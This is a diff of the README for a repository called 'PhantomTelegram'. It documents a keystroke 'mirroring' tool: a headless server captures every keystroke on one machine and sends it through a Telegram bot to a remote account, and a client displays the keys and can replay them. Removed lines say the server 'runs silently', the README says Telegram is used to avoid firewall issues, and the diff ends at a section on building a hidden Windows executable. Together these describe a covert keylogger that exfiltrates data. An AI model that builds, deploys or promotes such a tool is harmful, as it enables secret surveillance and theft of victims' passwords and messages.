Yaroslav1111/PhantomTelegram/README.md

    python -m src.main
    ```

-### Realtime Key Mirroring (new client/server)
+### Realtime Key Mirroring (Telegram transport)
+To avoid firewall issues, the mirroring pair talks through Telegram:

 **Server (captures and streams keys):**
+- Set `SERVER_BOT_TOKEN` to your bot token and `TARGET_USER_ID` to your Telegram account ID (or chat).
-- Runs silently with no configuration.
-Launch it on the source machine:
+- Start the headless streamer on the source machine:
   ```bash
   python -m src.server
   ```
-- Listens on `0.0.0.0:8765` and streams each translated keystroke immediately to any connected clients.
+- Every translated keystroke is sent as a JSON message to the target user; `/start` returns a short hint and `/stop` stops the streamer.

 **Client (receives and replays keys):**
+- Export your `TG_API_ID` and `TG_API_HASH` (from https://my.telegram.org) and optionally `SERVER_BOT_USERNAME` for convenience.
 - Start the UI on the destination machine:
   ```bash
   python -m src.client
   ```
-- Enter the server host/port, click **Подключиться**, and watch incoming keystrokes appear.
+- Enter the server-bot username, click **Подключиться**, and watch incoming keystrokes appear with latency in milliseconds.
-- Toggle **Копировать ввод** to decide whether received keys should be replayed locally; latency is shown in milliseconds.
+- Toggle **Копировать ввод** to decide whether received keys should be replayed locally through the keyboard controller.

 ## Building a Hidden Windows Executable